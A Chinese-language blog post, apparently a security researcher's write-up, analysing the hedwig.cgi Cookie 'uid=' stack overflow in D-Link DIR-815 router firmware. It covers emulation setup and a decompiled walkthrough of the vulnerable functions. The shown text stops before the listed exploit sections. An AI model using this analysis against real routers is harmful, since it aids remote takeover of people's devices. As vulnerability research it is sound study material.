<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-bounce.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"zikh26.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.17.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"default"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":"ture","trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="网上关于 D-Link DIR-815 路由器漏洞复现的文章还是蛮多的，因此第一次的复现选择了这个软柿子🤔。因为相关文章很多的缘故，所以我尽可能来写一些大多文章没有提到的点。  漏洞描述 ：DIR-815 固件中的 Hedwig.cgi 脚本中，在处理 HTTP 头时，如果 Cookie 字段中含 uid&#x3D; 的值则存在栈溢出漏洞，从而获得路由器远程控制权限 影响版本 ：DIR-815&amp;">
<meta property="og:type" content="article">
<meta property="og:title" content="D-Link DIR-815路由器溢出漏洞分析">
<meta property="og:url" content="https://zikh26.github.io/posts/d1f081a9.html">
<meta property="og:site_name" content="ZIKH26&#39;s Blog">
<meta property="og:description" content="网上关于 D-Link DIR-815 路由器漏洞复现的文章还是蛮多的，因此第一次的复现选择了这个软柿子🤔。因为相关文章很多的缘故，所以我尽可能来写一些大多文章没有提到的点。  漏洞描述 ：DIR-815 固件中的 Hedwig.cgi 脚本中，在处理 HTTP 头时，如果 Cookie 字段中含 uid&#x3D; 的值则存在栈溢出漏洞，从而获得路由器远程控制权限 影响版本 ：DIR-815&amp;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241301795.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241304963.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241311237.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241315177.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241319641.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241320382.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181721376.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305190951158.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181658971.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181659144.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181713829.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305180744182.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305210851749.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181102504.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181117507.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181126711.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181132195.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181110826.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305210943265.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305210954878.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305210959344.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211000998.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211014282.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211050021.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211102535.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211510370.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211147020.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211148333.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211441230.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211457716.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211458582.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211500301.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211502965.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211521976.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211526368.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305240902843.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211617086.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305212333766.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305212334427.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305220922344.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305221824553.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305221542829.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305221606264.png">
<meta property="article:published_time" content="2023-05-23T05:07:26.119Z">
<meta property="article:modified_time" content="2023-07-01T08:44:32.714Z">
<meta property="article:author" content="ZIKH26">
<meta property="article:tag" content="MIPS架构">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241301795.png">


<link rel="canonical" href="https://zikh26.github.io/posts/d1f081a9.html">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://zikh26.github.io/posts/d1f081a9.html","path":"posts/d1f081a9.html","title":"D-Link DIR-815路由器溢出漏洞分析"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>D-Link DIR-815路由器溢出漏洞分析 | ZIKH26's Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">ZIKH26's Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-友链"><a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%90%E8%A1%8C%E6%97%B6%E6%8A%A5%E9%94%99"><span class="nav-number">1.</span> <span class="nav-text">运行时报错</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%86%E6%9E%90%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%96%87%E4%BB%B6"><span class="nav-number">2.</span> <span class="nav-text">分析二进制文件</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#main"><span class="nav-number">2.1.</span> <span class="nav-text">main</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#hedwigcgi-main"><span class="nav-number">2.2.</span> <span class="nav-text">hedwigcgi_main</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#sess-get-uid"><span class="nav-number">2.2.1.</span> <span class="nav-text">sess_get_uid</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#sobj-new"><span class="nav-number">2.2.2.</span> <span class="nav-text">sobj_new</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#sobj-strcmp"><span class="nav-number">2.2.3.</span> <span class="nav-text">sobj_strcmp</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#sobj-add-char"><span class="nav-number">2.2.4.</span> <span class="nav-text">sobj_add_char</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#sobj-get-string"><span class="nav-number">2.2.5.</span> <span class="nav-text">sobj_get_string</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%8E%A7%E5%88%B6-haystack"><span class="nav-number">2.3.</span> <span class="nav-text">控制 haystack</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#cgibin-parse-request"><span class="nav-number">2.3.1.</span> <span class="nav-text">cgibin_parse_request</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#qemu-%E7%94%A8%E6%88%B7%E6%A8%A1%E5%BC%8F%E4%B8%8B%E5%A4%8D%E7%8E%B0"><span class="nav-number">3.</span> <span class="nav-text">qemu 用户模式下复现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#ROP-%E9%93%BE%E7%9A%84%E5%B8%83%E7%BD%AE"><span class="nav-number">3.1.</span> <span class="nav-text">ROP 链的布置</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E8%B0%83%E8%AF%95"><span class="nav-number">3.1.1.</span> <span class="nav-text">如何调试</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#ROP-system"><span class="nav-number">3.1.2.</span> <span class="nav-text">ROP-system</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#EXP"><span class="nav-number">3.1.2.1.</span> <span class="nav-text">EXP</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#ROP-ret2shellcode"><span class="nav-number">3.1.3.</span> <span class="nav-text">ROP-ret2shellcode</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#EXP-1"><span class="nav-number">3.1.3.1.</span> <span class="nav-text">EXP</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#qemu-%E7%B3%BB%E7%BB%9F%E6%A8%A1%E5%BC%8F%E4%B8%8B%E5%A4%8D%E7%8E%B0"><span class="nav-number">4.</span> <span class="nav-text">qemu 系统模式下复现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AE%9E%E7%8E%B0%E5%AE%BF%E4%B8%BB%E6%9C%BA%E4%B8%8E-qemu-%E7%9A%84%E9%80%9A%E4%BF%A1"><span class="nav-number">4.1.</span> <span class="nav-text">实现宿主机与 qemu 的通信</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%90%AF%E5%8A%A8-httpd-%E6%9C%8D%E5%8A%A1"><span class="nav-number">4.2.</span> <span class="nav-text">启动 httpd 服务</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#EXP-2"><span class="nav-number">4.3.</span> <span class="nav-text">EXP</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="nav-number">5.</span> <span class="nav-text">参考文章</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="ZIKH26"
      src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202307011626843.jpg">
  <p class="site-author-name" itemprop="name">ZIKH26</p>
  <div class="site-description" itemprop="description">万古凡间一过客，九天之上第一仙</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">111</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">113</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zikh26.github.io/posts/d1f081a9.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202307011626843.jpg">
      <meta itemprop="name" content="ZIKH26">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ZIKH26's Blog">
      <meta itemprop="description" content="万古凡间一过客，九天之上第一仙">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="D-Link DIR-815路由器溢出漏洞分析 | ZIKH26's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          D-Link DIR-815路由器溢出漏洞分析
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-05-23 13:07:26" itemprop="dateCreated datePublished" datetime="2023-05-23T13:07:26+08:00">2023-05-23</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-07-01 16:44:32" itemprop="dateModified" datetime="2023-07-01T16:44:32+08:00">2023-07-01</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/IOT%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">IOT安全</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>网上关于 <code>D-Link DIR-815</code> 路由器漏洞复现的文章还是蛮多的，因此第一次的复现选择了这个软柿子🤔。因为相关文章很多的缘故，所以我尽可能来写一些大多文章没有提到的点。</p>
<blockquote>
<p><strong>漏洞描述 ：DIR-815 固件中的 Hedwig.cgi 脚本中，在处理 HTTP 头时，如果 Cookie 字段中含 uid&#x3D; 的值则存在栈溢出漏洞，从而获得路由器远程控制权限</strong></p>
<p><strong>影响版本 ：DIR-815&#x2F;300&#x2F;600&#x2F;645等</strong></p>
</blockquote>
<span id="more"></span>

<p>首先下载固件，然后用 <code>binwalk</code> 解压出来得到文件系统，很多文章对这里进行了详细介绍，这里就不再赘述了，只记录一个关于解压后出现的软链接问题。我的 <code>ubuntu 18.04</code> 中 <code>binwalk</code>  解压文件系统时报了如下的 <code>warning</code></p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241301795.png" alt="image-20230524130155598"></p>
<p>查看 <code>web</code> 目录下的文件发现软链接都指向了 <code>/dev/null </code>（如下）</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241304963.png" alt="image-20230524130428836" style="zoom:50%;" />

<p>如果单纯的为了启动程序，可以去手动设置回原本的软链接（上面的 <code>warning</code> 中有记录原本的链接位置在哪），下文中也提到了这一点。不过在该漏洞复现完之后，我在一篇文章中发现了解决的方法。</p>
<p>先去下面这个目录，然后找到 <code>extractor.py</code> 文件（如果找不到这个目录的话也可以用 <code>find</code> 搜一下 <code>extractor.py</code> 的位置）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241311237.png" alt="image-20230524131107143"></p>
<p>然后来编辑这个文件，直接翻到文件的最后一行，应该是下面这样的</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241315177.png" alt="image-20230524131525489" style="zoom:67%;" />

<p>就改成 <code>if 0 and not</code> 让这个 <code>if</code> 进不去即可。</p>
<p>最后执行命令 <code>sudo python3 setup.py install</code> 重新安装 <code>binwalk</code> 就能生效了，可以看到现在的效果是正常的（如下）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241319641.png" alt="image-20230524131948361"></p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305241320382.png" alt="image-20230524132004859" style="zoom:50%;" />

<p>不过需要提一句，这里即使看起来软链接是正常的，但依然无法正常启动程序，如果想要运行某个程序的话（依然需要自己手动创建一个软链接，至少我的是这样）</p>
<h3 id="运行时报错"><a href="#运行时报错" class="headerlink" title="运行时报错"></a>运行时报错</h3><p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181721376.png" alt="image-20230518172151330"></p>
<p>这个报错说明找不到 <code>libgcc_s.so.1</code> 文件，解决方法是将解压固件得到的文件系统中的 <code>/lib</code> 目录下的 <code>libgcc_s.so.1</code> 文件软链接到 <code>/lib</code> 目录下即可</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305190951158.png" alt="image-20230519095103004"></p>
<p>然后再次运行发现并不是原本缺少 <code>libgcc_s.so.1</code> 的报错了（如下）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181658971.png" alt="image-20230518165839841"></p>
<p>看到这个字符串会感觉有点熟悉，将 <code>cgibin</code> 拖到 <code>ida</code> 里发现是程序里没有匹配到相应的函数（如下），因为运行的 <code>cgibin</code> 程序并不在这个匹配的列表中，正常情况下都是通过软链接指向的这个程序来执行的。所以要去执行 <code>hedwig.cgi</code> 程序</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181659144.png" alt="image-20230518165917093"></p>
<p>因为当初 <code>binwalk</code> 提取完固件，其中 <code>hedwig.cgi</code> 的软链接都指向了 <code>/dev/null</code> ，所以这里要把 <code>hedwig.cgi</code> 删掉，重新生成一个 <code>cgibin</code> 的软链接。</p>
<p>下图程序是成功跑起来了</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181713829.png" alt="image-20230518171306696"></p>
<h3 id="分析二进制文件"><a href="#分析二进制文件" class="headerlink" title="分析二进制文件"></a>分析二进制文件</h3><h4 id="main"><a href="#main" class="headerlink" title="main"></a>main</h4><p><code>main</code> 函数的最开始在匹配程序名以来调用不同的函数来实现具体功能。</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305180744182.png" alt="image-20230518074412983" style="zoom:50%;" />

<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">v3 = *argv;</span><br><span class="line">v6 = <span class="built_in">strrchr</span>(*argv, <span class="string">&#x27;/&#x27;</span>);</span><br><span class="line"><span class="keyword">if</span> ( v6 )</span><br><span class="line">  v3 = v6 + <span class="number">1</span>;</span><br><span class="line"><span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(v3, <span class="string">&quot;phpcgi&quot;</span>) )</span><br><span class="line">&#123;</span><br><span class="line">  v8 = (<span class="type">void</span> (__noreturn *)())phpcgi_main;</span><br><span class="line">  v9 = argc;</span><br><span class="line">  <span class="keyword">return</span> ((<span class="type">int</span> (__fastcall *)(<span class="type">int</span>, <span class="type">const</span> <span class="type">char</span> **, <span class="type">const</span> <span class="type">char</span> **))v8)(v9, argv, envp);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>以这段代码为例，首先根据 <code>*argv</code> 获取程序的名字，通过 <code>strrchr</code> 函数来匹配程序名中最后一个 <code>/</code> 出现的位置， <code>v6+1</code> 取的是 <code>/</code> 的下一个字符的地址，然后来匹配是否为 <code>phpcgi</code> 这个字符串， 如果是的话则跳转到 <code>phpcgi_main</code> 函数，整个 <code>main</code> 函数都是在做这个事情</p>
<h4 id="hedwigcgi-main"><a href="#hedwigcgi-main" class="headerlink" title="hedwigcgi_main"></a>hedwigcgi_main</h4><p>接下来逐步分析 <code>hedwigcgi_main</code> 函数</p>
<p><code>sprintf</code> 是危险函数，将字符串格式化后拷贝到指定内存时没有规定长度大小从而可能存在溢出</p>
<p>这里需要让环境变量 <code>REQUEST_METHOD</code> 为 <code>POST</code> ，并且创建 <code>/var/tmp/temp.xml</code> 文件</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305210851749.png" alt="image-20230521085117376"></p>
<p>上图中出现的一个关键函数是 <code>sess_get_uid</code> ，它的作用是将提取的 <code>COOKIE</code> 中 <code>uid=</code> 后面的字符串存为 <code>v4</code> 的 <code>data</code> 字段。下面来分析一下这个函数</p>
<h5 id="sess-get-uid"><a href="#sess-get-uid" class="headerlink" title="sess_get_uid"></a>sess_get_uid</h5><p>在分析这个函数之前，还需要分析前面出现过的几个函数 <code>sobj_new</code> <code>sobj_strcmp</code> <code>sobj_add_char</code>  <code>sobj_get_string</code> </p>
<h5 id="sobj-new"><a href="#sobj-new" class="headerlink" title="sobj_new"></a>sobj_new</h5><p>申请了一块堆，用来存储结构体的数据，主要关注的是 <code>max_len</code>  <code>used_len</code> <code>data</code> 这三个成员，其他几个之后逆向分析的时候没用到（这里每个字段的含义，不是一上来就知道的，这是分析其他函数时进行猜测的）</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181102504.png" alt="image-20230518110253441" style="zoom:50%;" />

<h5 id="sobj-strcmp"><a href="#sobj-strcmp" class="headerlink" title="sobj_strcmp"></a>sobj_strcmp</h5><p>传入的参数一个是 <code>sobj_new</code> 返回的结构体指针，另一个是字符串指针，判断结构体的 <code>data</code> 字段存储的字符串是否和传入的字符串一样</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181117507.png" alt="image-20230518111747463" style="zoom:50%;" />

<h5 id="sobj-add-char"><a href="#sobj-add-char" class="headerlink" title="sobj_add_char"></a>sobj_add_char</h5><p>传入了 <code>sobj_new</code> 返回的结构体指针，另一个参数是字符。首先判断结构体指针是否存在，<code>max_len</code> 是否等于 <code>used_len</code> 。如果符合条件的话将字符 <code>ch</code> 写入到 <code>data</code> 字段中，并且让 <code>used_len</code> 字段加一。</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181126711.png" alt="image-20230518112641661" style="zoom:50%;" />



<h5 id="sobj-get-string"><a href="#sobj-get-string" class="headerlink" title="sobj_get_string"></a>sobj_get_string</h5><p>该函数用于返回传入的结构体指针中 <code>data</code> 域的指针</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181132195.png" alt="image-20230518113206147" style="zoom:50%;" />



<p>现在来分析 <code>sess_get_uid</code> </p>
<p>函数最开始进行了一些初始化和判断，同时拿到了环境变量 <code>HTTP_COOKIE</code> 值的指针，并设置   <code>state</code> （ 状态位）为 <code>0</code></p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305181110826.png" alt="image-20230518111058786" style="zoom:50%;" />

<p>该函数具体功能是通过逐个扫描 <code>COOKIE</code> 的字符，来寻找 <code>=</code> ，如果找到了 <code>=</code> 则设置 <code>state</code> 为 <code>2</code> ，之后再扫描字符的时候因为 <code>state</code> 为 <code>2</code> 的缘故，都会进入另一个分支，去将扫描 <code>COOKIE</code> 的字符存储到 <code>v4</code> 结构体的 <code>data</code> 成员中。如果没有找到 <code>=</code> 那么 <code>state</code> 一直为 <code>1</code> ，则始终将 <code>COOKIE</code> 的字符存储到 <code>v2</code> 结构体的 <code>data</code> 成员中（如下图）</p>
<p>当扫描完 <code>COOKIE</code> 的所有字符后，去判断 <code>v2</code> 结构体的 <code>data</code> 成员是否为字符串 <code>uid</code> ，如果是的话，就将 <code>v4</code> 结构体之前存储的字符串写到结构体 <code>a1</code> 的 <code>data</code> 域中。（ <code>a1</code> 也就是 <code>sess_get_uid</code> 函数传入的结构体指针）</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305210943265.png" alt="image-20230521094300133" style="zoom: 67%;" />



<p>再回到 <code>hedwigcgi_main</code> 函数上，现在想执行到真正利用的溢出点，需要控制 <code>haystack</code> 的值才行（如下图）</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305210954878.png" alt="image-20230521095402701" style="zoom:50%;" /> 



<h4 id="控制-haystack"><a href="#控制-haystack" class="headerlink" title="控制 haystack"></a>控制 <code>haystack</code></h4><p>通过查看 <code>haystack</code> 的交叉引用（如下图），发现只有一个地方可以对 <code>haystack</code> 进行赋值</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305210959344.png" alt="image-20230521095927264" style="zoom:67%;" />



<p>跳转过去到了 <code>409A6C</code> 函数</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305211000998.png" alt="image-20230521100001952" style="zoom:50%;" />

